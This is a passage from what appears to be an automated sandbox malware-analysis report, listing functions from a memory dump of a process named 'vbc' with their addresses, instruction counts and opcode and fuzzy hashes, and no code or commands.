                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 507ac1a9c7607ee6fc30b6aadba73e767ca5fbd9138df4b3a3886b8290e89087
                                                                                                                                                  • Instruction ID: 46f0e5a337264a55f4f977fd75a800e6197296b143566af9337244674447a20c
                                                                                                                                                  • Opcode Fuzzy Hash: 507ac1a9c7607ee6fc30b6aadba73e767ca5fbd9138df4b3a3886b8290e89087
                                                                                                                                                  • Instruction Fuzzy Hash: 4941F571B403149FEB25DF64CC89F7AB7AABB45614F004CAAE985AB280D774EE40CF51
                                                                                                                                                  Function 05D0866E Relevance: .1, Instructions: 129COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                  • Instruction ID: 8f805075e3ca0213fe2a096d15a5a71b33c42396bdc76c74af816a83e0666c62
                                                                                                                                                  • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                  • Instruction Fuzzy Hash: 5941B575B00215ABDB15DF99CC84BBFB7BAFF88600F55506AE801A7385D670DD04DB60
                                                                                                                                                  Function 05C6A470 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9432ec6e7d9d4822344a3bb2279dfdd0dcaa48393804524a066d60e99b82f43e
                                                                                                                                                  • Instruction ID: a92b4f438ad632143bf12fd25c467340660344e74a9910699655f51bba8e4365
                                                                                                                                                  • Opcode Fuzzy Hash: 9432ec6e7d9d4822344a3bb2279dfdd0dcaa48393804524a066d60e99b82f43e
                                                                                                                                                  • Instruction Fuzzy Hash: 8041C032A48615CFCF14DF68C899BAD7BB5FB04364F180966E412BB391DB34DA40CBA4
                                                                                                                                                  Function 05C3A020 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                  • Instruction ID: e63c3cc8d47398106ac3f94a34b208def4561629212d71f00c811441564d7851
                                                                                                                                                  • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                  • Instruction Fuzzy Hash: EB413E39B0C219FBDF14DE55984DBB9B762FB40758F1588AAE8868B240D6318F50D790
                                                                                                                                                  Function 05C70710 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                  • Instruction ID: 77e97194078f0e48c0158e283b50501bf15a3c81122c0d0789f102d6549309ed
                                                                                                                                                  • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                  • Instruction Fuzzy Hash: 67413F75A04709EFDB24CF99C988AAAB7F5FF08700B10496DE556E7A50D730EA44CF50
                                                                                                                                                  Function 05C4262C Relevance: .1, Instructions: 119COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 48adcbfebc1f5cc3e072e55490f7b6b3b026bf38815c1f7d1f6260933bbf59e8
                                                                                                                                                  • Instruction ID: c7e7fbe1dd6e73dcc8e722d734f25c53c3e92892303841d31d2d7ce85f4a0bc3
                                                                                                                                                  • Opcode Fuzzy Hash: 48adcbfebc1f5cc3e072e55490f7b6b3b026bf38815c1f7d1f6260933bbf59e8
                                                                                                                                                  • Instruction Fuzzy Hash: 5241A175A01704DFCB25EF65C946E65B7B2FF49320F1089AAE4069B2A0DB30AA81DF51
                                                                                                                                                  Function 05CC05A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ace9390c364655a9fa579196c0c084bf9b5a7773966da315fb3ec5e2822c4535
                                                                                                                                                  • Instruction ID: b29af8062c9a3edae206a49c65e13c7b1d82451ec3799d6de258d9e948e2045d
                                                                                                                                                  • Opcode Fuzzy Hash: ace9390c364655a9fa579196c0c084bf9b5a7773966da315fb3ec5e2822c4535
                                                                                                                                                  • Instruction Fuzzy Hash: 81419272608651DFC321DF69C844A6EB7A5FFC8740F140A5DF89597680E730E904C7A5
                                                                                                                                                  Function 05C380A0 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d28f0831c77500ed9da537c4ba0f8c91bc03cfe67e8bd3f3fe442718ad855f56
                                                                                                                                                  • Instruction ID: c03e3270ab2b25ca071b6d4140963f857a19f6cf99d4fbf6ef3bbccbfa010163
                                                                                                                                                  • Opcode Fuzzy Hash: d28f0831c77500ed9da537c4ba0f8c91bc03cfe67e8bd3f3fe442718ad855f56
                                                                                                                                                  • Instruction Fuzzy Hash: 71410371E06619EFCB00DF15C841AA8B7B2FF44760F248A29E816A7290D734EE41DBD0
                                                                                                                                                  Function 05C38CD0 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cd2fb11dbef3c8cb35ba34b63222c4a75064569b7719f61626a9001ac385ae66
                                                                                                                                                  • Instruction ID: 63268245bbfc75630c359688c117409aab1fe74dd6311c06f56b03075c68b475
                                                                                                                                                  • Opcode Fuzzy Hash: cd2fb11dbef3c8cb35ba34b63222c4a75064569b7719f61626a9001ac385ae66
                                                                                                                                                  • Instruction Fuzzy Hash: 2C310971A062099FCB20DF59C841AAEB7F2FF98724F244D2EE456A7250CB34AD01DB80
                                                                                                                                                  Function 05C46EE0 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e729da54dc25dd8546914e7f3dda643b8a10e149bf476ba3d4032f0c36384f79
                                                                                                                                                  • Instruction ID: 9408b4f6e934f275022fd348711626f107c9ee80dcf9da4a050f5c176a490f31
                                                                                                                                                  • Opcode Fuzzy Hash: e729da54dc25dd8546914e7f3dda643b8a10e149bf476ba3d4032f0c36384f79
                                                                                                                                                  • Instruction Fuzzy Hash: 70419E36715A06EFDB16DF29C888F6ABBA6FF85340F044855E80287651CB74E960CF90
                                                                                                                                                  Function 05C502E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                  • Instruction ID: 9732dc666908a88a39ac648f386e91c8ab54d34c5e315c75e8334fae18398b09
                                                                                                                                                  • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                  • Instruction Fuzzy Hash: 00311A32604244AFDB11CBA9CC88FAABFE9FF04364F044965E855E7352C774D984CB94
                                                                                                                                                  Function 05CEE3DB Relevance: .1, Instructions: 105COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c788e0255c15aad72b0913b719b01b796bd9a4b3bc3ea783cc1be8ba0e65d5f6
                                                                                                                                                  • Instruction ID: 6d4e3a51d5f939c6c311596b520de0299c2cf4b828e1128dc4e0af7d7eb781b1
                                                                                                                                                  • Opcode Fuzzy Hash: c788e0255c15aad72b0913b719b01b796bd9a4b3bc3ea783cc1be8ba0e65d5f6
                                                                                                                                                  • Instruction Fuzzy Hash: E931C835750745ABD722AFD98C85F6B77B9EF48B94F000828F600AB391DAA4DD40D7E0
                                                                                                                                                  Function 05C44260 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 416c9de0faba5d52714ed624698a22868f5543d51428ad4cd402531de0a549d6
                                                                                                                                                  • Instruction ID: 96ccd5bda17a5cae80b8fa3abdec5e98bdc21ad3b38842c4bee72de047bfa476
                                                                                                                                                  • Opcode Fuzzy Hash: 416c9de0faba5d52714ed624698a22868f5543d51428ad4cd402531de0a549d6
                                                                                                                                                  • Instruction Fuzzy Hash: C241DF32200B469FCB26CF28C488FAA7BE5BB45794F144D29E95A9B250D774E800DB50
                                                                                                                                                  Function 05CE0DF0 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                                                                                                  • Instruction ID: 9a2651a2db9f4d5e929fc75b5241b52f7c8aff467febb1a889e782b0e21b8194
                                                                                                                                                  • Opcode Fuzzy Hash: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                                                                                                  • Instruction Fuzzy Hash: DF31B272209345AFD726DA24C849E6BB7E8EF80660F044D7DF891A7250E6B0ED05CBE1
                                                                                                                                                  Function 05D061C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 500970041154d72cc3eec4c32e4c4d3148a704368f339176876c4475bb78c66a
                                                                                                                                                  • Instruction ID: e1c50fe6a24c28005a20235c4b091ef47ff5bb905a6527444cb4353032c73b09
                                                                                                                                                  • Opcode Fuzzy Hash: 500970041154d72cc3eec4c32e4c4d3148a704368f339176876c4475bb78c66a
                                                                                                                                                  • Instruction Fuzzy Hash: B1310475A00216AFDB15DFA8CC80FBEB3B5FB44B44F014569E800AB284D770EC40CBA4
                                                                                                                                                  Function 05C407AF Relevance: .1, Instructions: 95COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: adbdd58b32c30a69edce5f7526da03b4219de822da7b61be7943ad01063b2109
                                                                                                                                                  • Instruction ID: ad75c0206975843d1df4cfdbe9c84c968dda98f261b52be6c8507a5402102c40
                                                                                                                                                  • Opcode Fuzzy Hash: adbdd58b32c30a69edce5f7526da03b4219de822da7b61be7943ad01063b2109
                                                                                                                                                  • Instruction Fuzzy Hash: DE31D432A44615DBC712DE288988E6BBBA6AFD4660F014D29FE55BB310DA30DC01DBD1
                                                                                                                                                  Function 05D060B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 482646ad6206645084597511a71f65cbbea9d073b0547a7b96d9b69204f1618f
                                                                                                                                                  • Instruction ID: 62b5cee6f84ae9ede407db47ded151698ca9094b3ab90152cb395ef05b80bd3c
                                                                                                                                                  • Opcode Fuzzy Hash: 482646ad6206645084597511a71f65cbbea9d073b0547a7b96d9b69204f1618f
                                                                                                                                                  • Instruction Fuzzy Hash: A231F131B41601AFDB12DFA8CC50BAEB7BAEF44754F00046AE501DB391DA70DC40DB91
                                                                                                                                                  Function 05C48550 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 72f4b02ce1f3d5bc6b9412c58d62bad0ba34a38fc1eb48827aa433d9eabdf3f4
                                                                                                                                                  • Instruction ID: b971be8f2a45d582491811532cddcafabf7eba23175c3cc2183e9c8d1c26cacc
                                                                                                                                                  • Opcode Fuzzy Hash: 72f4b02ce1f3d5bc6b9412c58d62bad0ba34a38fc1eb48827aa433d9eabdf3f4
                                                                                                                                                  • Instruction Fuzzy Hash: 8D319A766093528FE320CF19C840B2BBBE5FB88B04F054D6EE8869B251D774EA44CB91
                                                                                                                                                  Function 05C6AF69 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 06c957b018cb75e5950df1d26198f3a862220a77acdbfc89b7dbe3f35174ed4f
                                                                                                                                                  • Instruction ID: 2f1d22ed657a2f298c7a3043b5c4877b540c9e5b4a02d7bbff03d30ad889e2ef
                                                                                                                                                  • Opcode Fuzzy Hash: 06c957b018cb75e5950df1d26198f3a862220a77acdbfc89b7dbe3f35174ed4f
                                                                                                                                                  • Instruction Fuzzy Hash: 5F319575A011299BDB30DF69CC88FAFBBB9FF44644F0508A6E909E7210D6349F80CB91
                                                                                                                                                  Function 05C7A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                  • Instruction ID: 12ffc62dae8c6b5b8e0d8ceb4ea05ca824c327fb366ed05f11b26b76b9b37ff6
                                                                                                                                                  • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                  • Instruction Fuzzy Hash: 6F313A72B04B04AFD764CF6ACD40B6BB7F9BB08A50F040D6DA59AC3A50E670E900CB60
                                                                                                                                                  Function 05C6438F Relevance: .1, Instructions: 89COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 04898e83b0775e8c8ce4b8676b5db9bb0e30d43122f6bd859fd266f77d304529
                                                                                                                                                  • Instruction ID: 444f0ec09dde455469c789c980e96140fd7ab705b5eef98220e3bd1d069c5024
                                                                                                                                                  • Opcode Fuzzy Hash: 04898e83b0775e8c8ce4b8676b5db9bb0e30d43122f6bd859fd266f77d304529
                                                                                                                                                  • Instruction Fuzzy Hash: 2731C432B042059FCB18EFA9C9C5A7EBBF9EB84708F00892AD446D7654E730EE41CB50
                                                                                                                                                  Function 05C3E420 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e0379140f848055d4cbb965a6304bef6c8d0890b34ea2a766527a335f586c14d
                                                                                                                                                  • Instruction ID: 5c2775f90685a3475101915813cf0d90a65c1001703027f06a532cd6744abfc8
                                                                                                                                                  • Opcode Fuzzy Hash: e0379140f848055d4cbb965a6304bef6c8d0890b34ea2a766527a335f586c14d
                                                                                                                                                  • Instruction Fuzzy Hash: 4831C532A0152C9BDB35DF54CC46FEE77BEFB05790F0109A1E645A7290D6B4AE809F90
                                                                                                                                                  Function 05C3C156 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 497dadffa3c3ae43c3f373601e61f4ed9897ef7ac93dd6d1e8b6f24e238377ec
                                                                                                                                                  • Instruction ID: 3f558c2ab5641fcb2a5881675f3c646cb8c04a9cc6369509bc3e38130b7b019f
                                                                                                                                                  • Opcode Fuzzy Hash: 497dadffa3c3ae43c3f373601e61f4ed9897ef7ac93dd6d1e8b6f24e238377ec
                                                                                                                                                  • Instruction Fuzzy Hash: EE3159B96002009BCB25AF28CC49B7977B5FF40314F9489A9ED47AB345DE34DAC2CB94
                                                                                                                                                  Function 05CFC3CD Relevance: .1, Instructions: 88COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                  • Instruction ID: b88e872bbad3a05f6a48228ebf81be11cf380b71283fdb5311149b8fbe463cca
                                                                                                                                                  • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                  • Instruction Fuzzy Hash: 76216D36704659B6CB15AB94CC04EBBBBB4EF50710F409C1AFAA587690E638DD40D3A0
                                                                                                                                                  Function 05C74588 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                  • Instruction ID: 73150402a4e4712df656b5129a7f08cc19c555c2a036dcd51ce30954308756e6
                                                                                                                                                  • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                  • Instruction Fuzzy Hash: C5218D36A00608ABCF19CF98C9C4A9EBBA5FF48314F108869ED159B641D670EE45CB94
                                                                                                                                                  Function 05C744B0 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bdf26f521a1645a76ab74b672af8ce9565f4aa3ec431e202ca6175574afce0be
                                                                                                                                                  • Instruction ID: a111797b41b9ec5df39429626c0c3ca704f85e4a5553b0e59e3c6174fd14fe8d
                                                                                                                                                  • Opcode Fuzzy Hash: bdf26f521a1645a76ab74b672af8ce9565f4aa3ec431e202ca6175574afce0be
                                                                                                                                                  • Instruction Fuzzy Hash: 9A21C1726087499BCB26DF58C880B6BB7E5FF88B60F044D19FC559B640D770EA01CBA2
                                                                                                                                                  Function 05CBE609 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 420bceea9b3a8642c40bcbc749e43db97c3f076c07bea8d4594b144c61cab2c2
                                                                                                                                                  • Instruction ID: 1a370b8182841aec3a542475bdec7c67bc363119cd1b357ba3d66997d61e6819
                                                                                                                                                  • Opcode Fuzzy Hash: 420bceea9b3a8642c40bcbc749e43db97c3f076c07bea8d4594b144c61cab2c2
                                                                                                                                                  • Instruction Fuzzy Hash: 9B319175A00209EFDB14CF58C484DEE77BAFF94704F15485AE8069B390E7B1EA40CB94
                                                                                                                                                  Function 05C3E388 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
